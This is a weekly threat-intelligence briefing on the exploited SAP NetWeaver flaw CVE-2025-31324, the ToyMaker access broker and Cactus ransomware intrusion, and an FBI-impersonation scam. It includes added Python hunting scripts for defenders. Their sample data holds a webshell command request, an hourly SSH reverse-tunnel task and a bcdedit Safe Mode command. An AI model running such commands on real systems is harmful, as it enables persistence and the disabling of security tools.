TLP: CLEAR - This information may be shared publicly
eSentire's Threat Response Unit (TRU) compiles the following weekly intelligence overview, providing cybersecurity leaders with expert analysis and insights on the most important events of the past week along with important security tips.
Maximum Severity SAP Vulnerability Exploited
2025/04/25
Bottom Line: SAP has disclosed a maximum-severity vulnerability in SAP NetWeaver. Exploitation in the wild has been confirmed, which makes immediate application of the relevant security patches critical.
On April 24th, SAP disclosed a maximum-severity vulnerability impacting SAP NetWeaver systems. SAP NetWeaver is a software platform for integrating applications, processes, and data from various sources; it is commonly used in IT and government organizations. The vulnerability, tracked as CVE-2025-31324 (CVSS: 10), is a missing authorization vulnerability in the Visual Composer development server component of SAP NetWeaver, version 7.50. Unauthenticated threat actors may exploit the vulnerability to upload arbitrary files, including malicious executable binaries and webshells, leading to compromise of the host system.
The vulnerability was discovered following an investigation by ReliaQuest into multiple incidents involving the compromise of the SAP NetWeaver platform. The activity was initially suspected to be a remote file inclusion issue but was later categorized as an unrestricted file upload vulnerability and identified as CVE-2025-31324 by SAP.
In observed attacks, threat actors exploited the vulnerability by uploading Java Server Pages (JSP) webshells through POST requests to the developmentserver application alias. Once deployed, the webshells allowed the threat actors to upload further unauthorized files, gain additional control over compromised systems, execute code remotely, and potentially exfiltrate sensitive data by staging it in publicly accessible directories. The attackers then deployed Brute Ratel, a Command-and-Control (C2) framework typically used by penetration testers. Brute Ratel was retrieved from an external server and was used to inject malicious code into the compromised system's memory. The framework allowed attackers to maintain C2 access to compromised systems, customize payloads, and perform various post-exploitation activities.
As exploitation of CVE-2025-31324 has been confirmed, it is critical that all organizations using SAP NetWeaver systems apply the relevant security patches as soon as possible.
Organizations using SAP NetWeaver are strongly encouraged to apply the security patches released on April 24th. In addition to patching, it is important to review all suspicious file uploads to confirm that no webshell was deployed: a webshell provides persistent access and is not removed by patch deployment, so patching alone does not remediate an existing compromise. If patching is not immediately possible, alternative mitigations are recommended, including disabling the Visual Composer Metadata Uploader and the application alias "developmentserver". Organizations may also restrict access to the development server application URL to minimize the likelihood of exploitation.
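The review of "suspicious file uploads" above can be turned into a log hunt. The following is an added example, not code from eSentire, SAP or ReliaQuest: it scans constructed web-access log lines for the two-step pattern described in this section (a successful unauthenticated POST to the developmentserver alias, followed by requests to a .jsp file from the same source). The IP addresses, timestamps and combined-log format are constructed for the example; the /developmentserver/metadatauploader path is the one publicly associated with the Visual Composer Metadata Uploader, which the text above refers to only by its alias.

```python
"""Added example: hunt constructed web-access log lines for CVE-2025-31324
exploitation (POST to the developmentserver alias, then use of a dropped .jsp).
Everything below (IPs, paths, log format) is constructed sample data."""
import re
from dataclasses import dataclass

# Constructed combined-log-style lines; real SAP ICM HTTP logs have their own
# format, so LINE_RE would need adapting before use on production data.
SAMPLE_LOG = """\
203.0.113.7 - - [24/Apr/2025:10:01:02 +0000] "GET /irj/portal HTTP/1.1" 200 5120
203.0.113.7 - - [24/Apr/2025:10:01:09 +0000] "POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.1" 200 312
203.0.113.7 - - [24/Apr/2025:10:01:15 +0000] "GET /irj/helper.jsp?cmd=whoami HTTP/1.1" 200 88
198.51.100.4 - - [24/Apr/2025:10:02:00 +0000] "GET /developmentserver/metadatauploader HTTP/1.1" 401 0
192.0.2.9 - - [24/Apr/2025:10:03:30 +0000] "GET /irj/portal/anonymous HTTP/1.1" 200 4096
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+)'
)


@dataclass
class Finding:
    ip: str
    ts: str
    reason: str   # "upload" (hit on the uploader alias) or "jsp" (request to a .jsp)
    path: str


def hunt_sap_access_log(log_text):
    """Return findings in log order: uploader POSTs that succeeded, and any .jsp requests."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        method, path, status = m["method"], m["path"], int(m["status"])
        lower = path.lower()
        # 1) A successful POST to the developmentserver alias is the upload vector.
        #    A 401/403 here is what a correctly restricted alias should return.
        if method == "POST" and "/developmentserver/" in lower and status < 400:
            findings.append(Finding(m["ip"], m["ts"], "upload", path))
        # 2) Any request to a .jsp resource (especially with a command-style query)
        #    may be webshell use; Visual Composer does not normally serve user .jsp files.
        if lower.split("?", 1)[0].endswith(".jsp"):
            findings.append(Finding(m["ip"], m["ts"], "jsp", path))
    return findings


def correlate_upload_then_jsp(findings):
    """IPs that hit the uploader and afterwards requested a .jsp: the strongest signal."""
    first_upload = {}
    confirmed = set()
    for i, f in enumerate(findings):
        if f.reason == "upload":
            first_upload.setdefault(f.ip, i)
        elif f.reason == "jsp" and f.ip in first_upload:
            confirmed.add(f.ip)
    return sorted(confirmed)


if __name__ == "__main__":
    hits = hunt_sap_access_log(SAMPLE_LOG)
    for h in hits:
        print(f"{h.ts} {h.ip} {h.reason:6} {h.path}")
    print("upload followed by jsp use from:", correlate_upload_then_jsp(hits))
```

On the constructed data the correlation returns only 203.0.113.7; the 401 from 198.51.100.4 is a blocked probe and the .jsp request alone would be a weaker, single-stage signal. Any hit on the uploader alias after the April 24th patch or after the alias has been disabled should be treated as a scan, and any .jsp under a web-served directory that was not deployed by change management should be pulled for analysis before the host is patched, since patching leaves the webshell in place.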
Based on publicly available information, it is probable that a single threat actor group is currently targeting CVE-2025-31324. The publication of vulnerability details is likely to attract other threat actors and may lead to an increase in activity. At the time of writing, current activity has not been attributed to a specific group. ReliaQuest noted a significant delay between initial access and post-exploitation activity, leading to the assessment that the attacker is likely an Initial Access Broker (IAB) who gained access in order to sell it to other threat actors. IABs are commonly associated with ransomware deployment, although ransomware has not been observed by ReliaQuest in this activity.
In response to the disclosure of CVE-2025-31324, eSentire MDR for Network detections were created, threat hunts were performed, and an advisory on the topic was released on April 25th. Additionally, eSentire maintains detections for both webshell deployment and use of the Brute Ratel tool. For more information on this threat, including eSentire actions and recommendations, see the eSentire advisory Maximum Severity SAP Vulnerability Exploited.
Bottom Line: Details have emerged on a recently observed Initial Access Broker, ToyMaker, that has been identified exploiting vulnerable Internet-facing devices to deploy custom malware. Access to compromised organizations is being sold to secondary threat actors to conduct further attacks.
Cisco Talos' latest report on ToyMaker, a financially motivated threat actor group, details an extensive compromise of a critical infrastructure enterprise involving two separate threat actors. The compromise began with the exploitation of internet-facing systems, using custom tools to establish a foothold. ToyMaker deployed a proprietary backdoor named "LAGTOY" and extracted credentials from memory dumps, preparing the environment for subsequent threat actor activity. Within about one week of initial reconnaissance, credential harvesting, and backdoor deployment, ToyMaker ceased activity, with no evidence of data exfiltration or lateral movement. Approximately three weeks later, an affiliate of the Cactus ransomware group used the credentials stolen by ToyMaker to infiltrate the same enterprise and initiate a ransomware campaign. Talos assesses that ToyMaker's role was limited to acquiring and selling access, indicating a financial motivation and no espionage objective.
ToyMaker primarily used LAGTOY, a custom backdoor capable of creating reverse shells, executing commands, and persisting via a Windows service named 'WmiPrvSV'. The malware includes anti-debugging techniques, such as registering a custom unhandled exception filter, and features unique time-based logic for command execution and C2 beaconing.
Weeks later, the Cactus ransomware affiliate leveraged the credentials stolen by ToyMaker to gain access and deploy their own malware tools across the victim network. They conducted network reconnaissance using WSMAN discovery scripts to identify endpoints supporting PowerShell remoting.
For data exfiltration, tools such as 7-Zip, curl, and WinSCP were used to archive and transfer files containing customer data and sensitive enterprise information. The group used various remote administration tools, including AnyDesk, eHorus, RMS Remote Admin, and OpenSSH, to maintain persistent access. They also established reverse shells using OpenSSH, with scheduled tasks configured to reach out to the C2 server hourly. The Cactus affiliate deleted SSH private keys after exfiltration to hinder forensic analysis and conceal their tracks. On some systems, they created unauthorized user accounts. The attackers rebooted infected hosts into Safe Mode to disable or bypass security products and further establish their presence in the environment. They also deployed Metasploit-injected binaries, such as modified PuTTY and ApacheBench executables, to execute code and communicate with the same C2 server across multiple ports.
This event illustrates the growing specialization of threat actors within the cybercrime ecosystem. ToyMaker acted purely as an access broker, compromising the target environment and then selling access rather than pursuing further exploitation. Access brokers like ToyMaker are becoming a critical link in the ransomware supply chain, offering pre-compromised environments to affiliates of ransomware groups. From initial access to double extortion, these actors slowly and steadily compromised a multitude of hosts in the network using a combination of tools, targeting valuable data within the victim's environment. The exposure of sensitive information to other threat actor groups has long-lasting consequences, as stolen data can resurface months or even years after the initial breach. It is therefore essential for organizations to track and improve visibility into early-stage intrusion indicators.
The attack was conducted in two distinct phases over a multi-week period: ToyMaker's initial-access activity went quiet before the Cactus affiliate began its own activity weeks later. Early-stage events of this kind must be monitored and acted on promptly so that later stages of compromise can be prevented. Organizations should also maintain active vulnerability scanning, prioritize patching of critical CVEs with public Proof-of-Concept (PoC) exploits, and monitor for unusual network traffic. The report also notes that the attackers rebooted machines into Safe Mode, a tactic used to disable endpoint detection and antivirus protections, since security tools often do not load or function in Safe Mode. Organizations should therefore monitor system boot sequences for irregular patterns, especially on high-value systems.
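The behaviours listed in this section (the LAGTOY 'WmiPrvSV' service, hourly scheduled tasks launching OpenSSH, reboots into Safe Mode, and new local accounts) each leave a Windows event that can be hunted for. The following is an added example, not code from Cisco Talos or eSentire: four small rules run over constructed event records. The field names follow the Windows Security and System event schemas (7045 service installation, 4698 scheduled task creation, 4688 process creation, 4720 user account creation), but the records, paths, IP address and account names are constructed for the example.

```python
"""Added example: hunt constructed Windows event records for the four
post-exploitation behaviours described above. Event field names match the
Windows Security/System event schemas; the records themselves are constructed."""
import re

# Constructed parsed event records (as an EDR/SIEM would present them).
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "WmiPrvSV",
     "ImagePath": r"C:\Windows\Temp\svchost.exe", "StartType": "auto start"},
    {"EventID": 7045, "ServiceName": "Winmgmt",
     "ImagePath": r"C:\Windows\system32\svchost.exe -k netsvcs", "StartType": "auto start"},
    {"EventID": 4698, "TaskName": r"\Microsoft\Windows\Update\Check",
     "TaskContent": "<Triggers><TimeTrigger><Repetition><Interval>PT1H</Interval>"
                    "</Repetition></TimeTrigger></Triggers><Actions><Exec>"
                    "<Command>C:\\ProgramData\\ssh.exe</Command>"
                    "<Arguments>-R 2222:localhost:445 ops@203.0.113.55</Arguments>"
                    "</Exec></Actions>"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\bcdedit.exe",
     "CommandLine": "bcdedit /set {default} safeboot network"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
    {"EventID": 4720, "TargetUserName": "svc_backup", "SubjectUserName": "Administrator"},
]

# The WMI service itself is "Winmgmt" and the provider host is the WmiPrvSE.exe
# process, so any *service* whose name starts with "WmiPrvS" is a lookalike.
LOOKALIKE_SERVICE = re.compile(r"^wmiprvs", re.I)


def rule_lagtoy_service(ev):
    """7045: service install whose name mimics the WMI provider host."""
    if ev["EventID"] == 7045 and LOOKALIKE_SERVICE.match(ev["ServiceName"]):
        return f"service '{ev['ServiceName']}' mimics WmiPrvSE, image {ev['ImagePath']}"
    return None


def rule_hourly_ssh_task(ev):
    """4698: scheduled task repeating every hour whose action runs ssh."""
    if ev["EventID"] != 4698:
        return None
    xml = ev["TaskContent"]
    hourly = "<Interval>PT1H</Interval>" in xml
    runs_ssh = re.search(r"<Command>[^<]*\bssh(?:\.exe)?</Command>", xml, re.I) is not None
    if hourly and runs_ssh:
        return f"task {ev['TaskName']} runs ssh hourly (reverse-shell beacon)"
    return None


def rule_safe_mode(ev):
    """4688: bcdedit used to set a Safe Mode boot. Requires command-line
    auditing ("Include command line in process creation events") to be enabled."""
    if (ev["EventID"] == 4688
            and ev["NewProcessName"].lower().endswith("bcdedit.exe")
            and "safeboot" in ev["CommandLine"].lower()):
        return f"Safe Mode boot configured: {ev['CommandLine']}"
    return None


def rule_new_account(ev):
    """4720: local account creation; triage against change records."""
    if ev["EventID"] == 4720:
        return f"account {ev['TargetUserName']} created by {ev['SubjectUserName']}"
    return None


RULES = [rule_lagtoy_service, rule_hourly_ssh_task, rule_safe_mode, rule_new_account]


def hunt_windows_events(events):
    """Run every rule over every event; return (EventID, description) hits in order."""
    hits = []
    for ev in events:
        for rule in RULES:
            msg = rule(ev)
            if msg:
                hits.append((ev["EventID"], msg))
    return hits


if __name__ == "__main__":
    for event_id, msg in hunt_windows_events(SAMPLE_EVENTS):
        print(event_id, msg)
```

On the constructed data the benign Winmgmt service and the notepad process produce no hits, while the four behaviours from the report each produce one. In practice the account-creation rule is noisy on its own and is best used to enrich a hit from one of the other three; the Safe Mode rule is the one to alert on immediately, because the reboot that follows it is the point at which endpoint protection stops reporting.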
In response to the release of this report, the eSentire Threat Intelligence team is actively monitoring this topic and exploring new detection opportunities. The eSentire Threat Intelligence team has performed threat hunts across the customer base, and known malicious infrastructure is blocked via the eSentire Global Block List. The use of remote access tools in this intrusion highlights the importance of restricting such tools through policy enforcement, permitting their use only when necessary for regular operations. For additional insights into how threat actors are gaining initial access and exploiting legitimate Remote Monitoring and Management (RMM) tools, the eSentire Threat Intelligence team has provided an in-depth analysis in the October eSentire TRU Intelligence Briefing webinar.
Bottom Line: The FBI has issued a Public Service Announcement warning of a scam where individuals impersonate FBI Internet Crime Complaint Center employees to deceive and defraud victims of previous financial scams, exploiting their vulnerability and desperation for assistance in recovering lost funds.
On April 18th, the FBI released a Public Service Announcement (PSA), providing details on a scam that has been reported since December 2023. The scam involves threat actors posing as employees of the FBI's Internet Crime Complaint Center (IC3), with the purpose of defrauding victims of previous financial scams. Initial contact has varied between reports and has consisted of victims receiving emails, phone calls, or being contacted online, through either social media or online forums. The ruse involves threat actors claiming to have recovered funds that the victims have initially lost in previous financial scams.
One example provided by the FBI involved threat actors creating female persona profiles on social media websites and using them to join groups for financial fraud victims. The scammers claim that they themselves are victims of financial scams and recommend that users reach out over Telegram to "Jaime Quin", a threat actor posing as the "Chief Director" of IC3. When contacted, the threat actor claims to have recovered the victim's previously stolen funds and uses this ruse to obtain their financial information in order to revictimize them.
Within their PSA, the FBI highlights that the IC3 will never directly communicate with individuals via phone, email, social media, apps, or public forums. Individuals will be contacted by FBI employees from local field offices, or other law enforcement agencies. The FBI notes that tactics and aliases for these scams will change over time, but that threat actors will consistently request sensitive information from victims, including banking information, Social Security Numbers (SSNs), or other Personal Identifiable Information (PII).
Details of this scam indicate that threat actors are deliberately targeting victims of previous financial scams in an attempt to revictimize them. This targeting likely reflects an assumption that people with a history of falling for scams are more susceptible to a new one, and it exploits the desperation of victims who have already lost funds and are seeking to recover them. The FBI indicates that it received over 100 complaints of this scam between December 2023 and February 2025; the actual number of victims is likely higher, with many cases going unreported due to factors such as embarrassment, shame, or self-blame.
Threat actors posing as government officials to conduct financial scams is not a novel technique, and there are many recent examples of similar tactics. In March 2022, the FBI released a PSA describing a scam in which threat actors spoofed the phone numbers of government and law enforcement agencies to extort money or steal PII from victims. Additional examples include scams in Europe, where threat actors posed as Europol agents or financial advisors, and in Canada, where threat actors posed as agents of the Canada Revenue Agency (CRA), both of which involved attempts to defraud victims for financial gain.
On April 23rd, 2025, the FBI IC3 released its annual Internet Crime Report for 2024, which indicates that Americans lost $16.6 billion to online scams in 2024, up 33% from 2023. The FBI reports that the average loss for victims of financial scams in 2024 was $19,000, with seniors (individuals over the age of 60) being the group with the largest losses, at a total of $4.8 billion. These statistics highlight the cost of financial scams to individuals while demonstrating how lucrative they are for attackers, which suggests that financially motivated actors will continue to use and adapt these scams. To help prevent users from falling victim, organizations should implement Phishing and Security Awareness Training (PSAT) programs that teach users how to identify and report malicious content.
The threat briefing is a weekly intelligence overview for non-technical users. The Threat Intelligence team at eSentire investigates, analyzes, and organizes the most important events of the past week along with important security tips and redistributes the findings for quick reading. The main goal of this briefing is to improve the overall awareness of readers regarding cyber security.
Our industry-renowned Threat Response Unit (TRU) is an elite team of threat hunters and researchers, that supports our 24/7 Security Operations Centers (SOCs), builds detection models across our Atlas Security Operations Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. TRU has been recognized for its threat hunting, original research and content development capabilities. TRU is strategically organized into cross-functional groups to protect you against advanced and emerging threats, allowing your organization to gain leading threat intelligence and incredible cybersecurity acumen.